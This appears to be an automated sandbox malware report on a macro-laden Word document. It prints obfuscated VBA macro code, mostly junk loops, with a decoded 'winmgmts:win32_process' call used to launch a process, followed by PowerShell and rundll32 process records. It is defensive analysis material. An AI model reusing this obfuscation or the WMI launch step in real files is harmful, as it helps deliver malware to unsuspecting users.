                                                                      FTbqcNF = Replace(saw, "sjgwb", "hqkwjbjdasd" & dUBsAD)

                                                                      Replace

                                                                      saw

                                                                      241

                                                                      TpAnAB.Range.Text = FTbqcNF

                                                                      Range

                                                                      242

                                                                      Set TpAnAB.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      243

                                                                      Endif

                                                                      244

                                                                      Set bEIjwUFFB = EBTVGH

                                                                      EBTVGH

                                                                      245

                                                                      Next TpAnAB

                                                                      Paragraphs

                                                                      245

                                                                      dUBsAD:

                                                                      247

                                                                      Goto ruwfBB

                                                                      248

                                                                      Dim BApwTCG as Paragraph

                                                                      249

                                                                      Set ubHTxDED = ilrmFI

                                                                      ilrmFI

                                                                      250

                                                                      For Each BApwTCG in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      251

                                                                      Set dueIMGo = zhliJ

                                                                      zhliJ

                                                                      252

                                                                      If Left(BApwTCG.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      253

                                                                      ruwfBB = BApwTCG.Range.ListFormat.ListString

                                                                      Range

                                                                      254

                                                                      Elseif InStr(BApwTCG.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      255

                                                                      jVymJ = BApwTCG.Range.Text

                                                                      Range

                                                                      256

                                                                      jVymJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & ruwfBB)

                                                                      Replace

                                                                      saw

                                                                      257

                                                                      BApwTCG.Range.Text = jVymJ

                                                                      Range

                                                                      258

                                                                      Set BApwTCG.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      259

                                                                      Endif

                                                                      260

                                                                      Set XSZpp = DvhBN

                                                                      DvhBN

                                                                      261

                                                                      Next BApwTCG

                                                                      Paragraphs

                                                                      261

                                                                      ruwfBB:

                                                                      263

                                                                      Goto BlbPRi

                                                                      264

                                                                      Dim pbPXFg as Paragraph

                                                                      265

                                                                      Set lSOmIHg = wHzvQRHCw

                                                                      wHzvQRHCw

                                                                      266

                                                                      For Each pbPXFg in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      267

                                                                      Set vttGko = OtoVEFFI

                                                                      OtoVEFFI

                                                                      268

                                                                      If Left(pbPXFg.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      269

                                                                      BlbPRi = pbPXFg.Range.ListFormat.ListString

                                                                      Range

                                                                      270

                                                                      Elseif InStr(pbPXFg.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      271

                                                                      SEEmDH = pbPXFg.Range.Text

                                                                      Range

                                                                      272

                                                                      SEEmDH = Replace(saw, "sjgwb", "hqkwjbjdasd" & BlbPRi)

                                                                      Replace

                                                                      saw

                                                                      273

                                                                      pbPXFg.Range.Text = SEEmDH

                                                                      Range

                                                                      274

                                                                      Set pbPXFg.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      275

                                                                      Endif

                                                                      276

                                                                      Set IGyeHIDF = tfnHGB

                                                                      tfnHGB

                                                                      277

                                                                      Next pbPXFg

                                                                      Paragraphs

                                                                      277

                                                                      BlbPRi:

                                                                      279

                                                                      Hbs0geilvqul = Replace(Cxe014lg73v5, "sg yw ah", Zn5_1mdwh2kp2)

                                                                      Replace("wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ahsg yw ahsg yw ahssg yw ahsg yw ahsg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ahsg yw ahpsg yw ahsg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah","sg yw ah",) -> winmgmts:win32_process

                                                                      Zn5_1mdwh2kp2

                                                                      executed
                                                                      280

                                                                      Goto YfXWF

                                                                      281

                                                                      Dim aiupjCA as Paragraph

                                                                      282

                                                                      Set HFzCp = aNLHyKGxD

                                                                      aNLHyKGxD

                                                                      283

                                                                      For Each aiupjCA in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      284

                                                                      Set NrnOEeCi = VrzOGkkDJ

                                                                      VrzOGkkDJ

                                                                      285

                                                                      If Left(aiupjCA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      286

                                                                      YfXWF = aiupjCA.Range.ListFormat.ListString

                                                                      Range

                                                                      287

                                                                      Elseif InStr(aiupjCA.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      288

                                                                      EiZIHkBmm = aiupjCA.Range.Text

                                                                      Range

                                                                      289

                                                                      EiZIHkBmm = Replace(saw, "sjgwb", "hqkwjbjdasd" & YfXWF)

                                                                      Replace

                                                                      saw

                                                                      290

                                                                      aiupjCA.Range.Text = EiZIHkBmm

                                                                      Range

                                                                      291

                                                                      Set aiupjCA.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      292

                                                                      Endif

                                                                      293

                                                                      Set LCIxEHv = ykoqBxAG

                                                                      ykoqBxAG

                                                                      294

                                                                      Next aiupjCA

                                                                      Paragraphs

                                                                      294

                                                                      YfXWF:

                                                                      296

                                                                      Goto dwTYCJwLC

                                                                      297

                                                                      Dim aqFpElJ as Paragraph

                                                                      298

                                                                      Set aiaDHfVAA = BjqtUGzGV

                                                                      BjqtUGzGV

                                                                      299

                                                                      For Each aqFpElJ in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      300

                                                                      Set WHeXGpVAC = LEeUqk

                                                                      LEeUqk

                                                                      301

                                                                      If Left(aqFpElJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      302

                                                                      dwTYCJwLC = aqFpElJ.Range.ListFormat.ListString

                                                                      Range

                                                                      303

                                                                      Elseif InStr(aqFpElJ.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      304

                                                                      wTHGJGJ = aqFpElJ.Range.Text

                                                                      Range

                                                                      305

                                                                      wTHGJGJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & dwTYCJwLC)

                                                                      Replace

                                                                      saw

                                                                      306

                                                                      aqFpElJ.Range.Text = wTHGJGJ

                                                                      Range

                                                                      307

                                                                      Set aqFpElJ.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      308

                                                                      Endif

                                                                      309

                                                                      Set KnxFzdf = wuVfVIU

                                                                      wuVfVIU

                                                                      310

                                                                      Next aqFpElJ

                                                                      Paragraphs

                                                                      310

                                                                      dwTYCJwLC:

                                                                      312

                                                                      Goto PIEpnIEQ

                                                                      313

                                                                      Dim DagVrchHi as Paragraph

                                                                      314

                                                                      Set QjbRmCII = ifZhJxP

                                                                      ifZhJxP

                                                                      315

                                                                      For Each DagVrchHi in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      316

                                                                      Set QurlJAjI = rQGxCbRtR

                                                                      rQGxCbRtR

                                                                      317

                                                                      If Left(DagVrchHi.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      318

                                                                      PIEpnIEQ = DagVrchHi.Range.ListFormat.ListString

                                                                      Range

                                                                      319

                                                                      Elseif InStr(DagVrchHi.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      320

                                                                      xWqeABhHw = DagVrchHi.Range.Text

                                                                      Range

                                                                      321

                                                                      xWqeABhHw = Replace(saw, "sjgwb", "hqkwjbjdasd" & PIEpnIEQ)

                                                                      Replace

                                                                      saw

                                                                      322

                                                                      DagVrchHi.Range.Text = xWqeABhHw

                                                                      Range

                                                                      323

                                                                      Set DagVrchHi.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      324

                                                                      Endif

                                                                      325

                                                                      Set wJKPQpiH = NirTjIE

                                                                      NirTjIE

                                                                      326

                                                                      Next DagVrchHi

                                                                      Paragraphs

                                                                      326

                                                                      PIEpnIEQ:

                                                                      328

                                                                      End Function

                                                                      Function Yvxv3g2kutodnaylkq, APIs: 162, Strings: 60, Number of lines: 70, Relevance: 333.07
                                                                      APIsMeta Information

                                                                      nWADOALQ

                                                                      Paragraphs

                                                                      EqstFcEf

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      CITOv

                                                                      swJREBktH

                                                                      Paragraphs

                                                                      MllKTIJEc

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      fishDz

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: ZBXzADzi

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: ZAXDGY

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: EBTVGH

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: ilrmFI

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: zhliJ

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: DvhBN

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: wHzvQRHCw

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: OtoVEFFI

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: tfnHGB

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Zn5_1mdwh2kp2

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: aNLHyKGxD

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: VrzOGkkDJ

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: ykoqBxAG

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: BjqtUGzGV

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: LEeUqk

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: wuVfVIU

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: ifZhJxP

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: rQGxCbRtR

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Hbs0geilvqul@Nst6otvnmgmpw: NirTjIE

                                                                      xvhwEkIi

                                                                      Paragraphs

                                                                      vYqwDI

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      MFcvbrIeP

                                                                      HmUuEIbVG

                                                                      Paragraphs

                                                                      gzBJqD

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      Range

                                                                      InStr

                                                                      Range

                                                                      Range

                                                                      Replace

                                                                      saw

                                                                      Range

                                                                      Range

                                                                      Styles

                                                                      polxC

                                                                      StringsDecrypted Strings
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "xxx"
                                                                      "xxxx"
                                                                      "Normal"
                                                                      "hqkwjbjdasd"
                                                                      "kkiew"
                                                                      "sjgwb"
                                                                      "hqkwjbjdasd"
                                                                      "sjgwb"
                                                                      "Normal"
                                                                      LineInstructionMeta Information
                                                                      160

                                                                      Function Yvxv3g2kutodnaylkq(T3bxybxcdn5d)

                                                                      161

                                                                      On Error Resume Next

                                                                      executed
                                                                      162

                                                                      Goto zfIxDdGy

                                                                      163

                                                                      Dim KekJrc as Paragraph

                                                                      164

                                                                      Set mWRkEDBn = nWADOALQ

                                                                      nWADOALQ

                                                                      165

                                                                      For Each KekJrc in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      166

                                                                      Set jhoJOEJc = EqstFcEf

                                                                      EqstFcEf

                                                                      167

                                                                      If Left(KekJrc.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      168

                                                                      zfIxDdGy = KekJrc.Range.ListFormat.ListString

                                                                      Range

                                                                      169

                                                                      Elseif InStr(KekJrc.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      170

                                                                      rvAquNI = KekJrc.Range.Text

                                                                      Range

                                                                      171

                                                                      rvAquNI = Replace(saw, "sjgwb", "hqkwjbjdasd" & zfIxDdGy)

                                                                      Replace

                                                                      saw

                                                                      172

                                                                      KekJrc.Range.Text = rvAquNI

                                                                      Range

                                                                      173

                                                                      Set KekJrc.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      174

                                                                      Endif

                                                                      175

                                                                      Set QpteDQ = CITOv

                                                                      CITOv

                                                                      176

                                                                      Next KekJrc

                                                                      Paragraphs

                                                                      176

                                                                      zfIxDdGy:

                                                                      178

                                                                      Zonfu7wvfwo = T3bxybxcdn5d

                                                                      179

                                                                      Goto QrQLEAI

                                                                      180

                                                                      Dim aJzPBis as Paragraph

                                                                      181

                                                                      Set EGxLDh = swJREBktH

                                                                      swJREBktH

                                                                      182

                                                                      For Each aJzPBis in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      183

                                                                      Set uqBHEDw = MllKTIJEc

                                                                      MllKTIJEc

                                                                      184

                                                                      If Left(aJzPBis.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      185

                                                                      QrQLEAI = aJzPBis.Range.ListFormat.ListString

                                                                      Range

                                                                      186

                                                                      Elseif InStr(aJzPBis.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      187

                                                                      golkzCJBD = aJzPBis.Range.Text

                                                                      Range

                                                                      188

                                                                      golkzCJBD = Replace(saw, "sjgwb", "hqkwjbjdasd" & QrQLEAI)

                                                                      Replace

                                                                      saw

                                                                      189

                                                                      aJzPBis.Range.Text = golkzCJBD

                                                                      Range

                                                                      190

                                                                      Set aJzPBis.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      191

                                                                      Endif

                                                                      192

                                                                      Set qOgvIXcc = fishDz

                                                                      fishDz

                                                                      193

                                                                      Next aJzPBis

                                                                      Paragraphs

                                                                      193

                                                                      QrQLEAI:

                                                                      195

                                                                      Mgpwbt669dipg22hz = Hbs0geilvqul(Zonfu7wvfwo)

                                                                      196

                                                                      Goto VGSqAr

                                                                      197

                                                                      Dim kBCITgNAC as Paragraph

                                                                      198

                                                                      Set vXdLFECJ = xvhwEkIi

                                                                      xvhwEkIi

                                                                      199

                                                                      For Each kBCITgNAC in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      200

                                                                      Set SeBOI = vYqwDI

                                                                      vYqwDI

                                                                      201

                                                                      If Left(kBCITgNAC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      202

                                                                      VGSqAr = kBCITgNAC.Range.ListFormat.ListString

                                                                      Range

                                                                      203

                                                                      Elseif InStr(kBCITgNAC.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      204

                                                                      bxSXGCyrq = kBCITgNAC.Range.Text

                                                                      Range

                                                                      205

                                                                      bxSXGCyrq = Replace(saw, "sjgwb", "hqkwjbjdasd" & VGSqAr)

                                                                      Replace

                                                                      saw

                                                                      206

                                                                      kBCITgNAC.Range.Text = bxSXGCyrq

                                                                      Range

                                                                      207

                                                                      Set kBCITgNAC.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      208

                                                                      Endif

                                                                      209

                                                                      Set LqcVa = MFcvbrIeP

                                                                      MFcvbrIeP

                                                                      210

                                                                      Next kBCITgNAC

                                                                      Paragraphs

                                                                      210

                                                                      VGSqAr:

                                                                      212

                                                                      Yvxv3g2kutodnaylkq = Mgpwbt669dipg22hz

                                                                      213

                                                                      Goto ODMoFC

                                                                      214

                                                                      Dim PEaiK as Paragraph

                                                                      215

                                                                      Set ihnSRH = HmUuEIbVG

                                                                      HmUuEIbVG

                                                                      216

                                                                      For Each PEaiK in Bcur5699z4d.Paragraphs

                                                                      Paragraphs

                                                                      217

                                                                      Set sDmVCG = gzBJqD

                                                                      gzBJqD

                                                                      218

                                                                      If Left(PEaiK.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then

                                                                      Left

                                                                      Range

                                                                      Len

                                                                      219

                                                                      ODMoFC = PEaiK.Range.ListFormat.ListString

                                                                      Range

                                                                      220

                                                                      Elseif InStr(PEaiK.Range.Text, "kkiew") > 1 Then

                                                                      InStr

                                                                      Range

                                                                      221

                                                                      NcnmJ = PEaiK.Range.Text

                                                                      Range

                                                                      222

                                                                      NcnmJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & ODMoFC)

                                                                      Replace

                                                                      saw

                                                                      223

                                                                      PEaiK.Range.Text = NcnmJ

                                                                      Range

                                                                      224

                                                                      Set PEaiK.Range.ParagraphStyle = Bcur5699z4d.Styles("Normal")

                                                                      Range

                                                                      Styles

                                                                      225

                                                                      Endif

                                                                      226

                                                                      Set CzpmH = polxC

                                                                      polxC

                                                                      227

                                                                      Next PEaiK

                                                                      Paragraphs

                                                                      227

                                                                      ODMoFC:

                                                                      229

                                                                      End Function

                                                                      Module: Xxuu21l7kiwbxwj_0

                                                                      Declaration
                                                                      LineContent
                                                                      1

                                                                      Attribute VB_Name = "Xxuu21l7kiwbxwj_0"

                                                                      Reset < >

                                                                        Analysis Process: powershell.exe PID: 2552 Parent PID: 2652 powershell.exeCOMMON

                                                                        Executed Functions

                                                                        Function 000007FF002608C9, Relevance: .3, Instructions: 314COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2114923686.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7ff00260000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 41a06a7bb28046b949744186b3f47e06ea578bce4997d7396be8a320dede36d5
                                                                        • Instruction ID: 9a85450da84ff1588ab4ac9f55239a0a6555cbdbb5e870914627c7ccef077d4d
                                                                        • Opcode Fuzzy Hash: 41a06a7bb28046b949744186b3f47e06ea578bce4997d7396be8a320dede36d5
                                                                        • Instruction Fuzzy Hash: 2271482190EBC64FE74397389C657A17FB1AF17210B0E00E7D4C8CB0A3D9599D9AC362
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 000007FF00262F45, Relevance: .3, Instructions: 288COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2114923686.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7ff00260000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 59cb83241c51ee5cdd4bc281114eea334c5d7c29b425b6804937b6be144b5f24
                                                                        • Instruction ID: bdf9f99a53b24ccc24b4795b8c83e7402209eac60587a6c310c25aa7bdef5499
                                                                        • Opcode Fuzzy Hash: 59cb83241c51ee5cdd4bc281114eea334c5d7c29b425b6804937b6be144b5f24
                                                                        • Instruction Fuzzy Hash: E571472150F7C64FE3439B7898656A17FB0AF17210B0A01EBD4C8CF0A3E9595E5DC7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 000007FF00262921, Relevance: .1, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2114923686.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7ff00260000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 57fb6ef7be87cf6dcdd724c1e6c8e1fd28bfe483f88d28f756182a745f552411
                                                                        • Instruction ID: 89185c6d835041e6168daf2af59056a066fd8b29fc38e7d4405384170b65618b
                                                                        • Opcode Fuzzy Hash: 57fb6ef7be87cf6dcdd724c1e6c8e1fd28bfe483f88d28f756182a745f552411
                                                                        • Instruction Fuzzy Hash: 4F11BD6088E3C68FD3035B7858252A07FB1AF97215B4E01D7D8C9CF0B3E55D5AAAC762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Analysis Process: rundll32.exe PID: 2360 Parent PID: 2364 rundll32.exeCOMMON

                                                                        Execution Graph

                                                                        Execution Coverage:5%
                                                                        Dynamic/Decrypted Code Coverage:25.3%
                                                                        Signature Coverage:23.1%
                                                                        Total number of Nodes:91
                                                                        Total number of Limit Nodes:4

                                                                        Graph

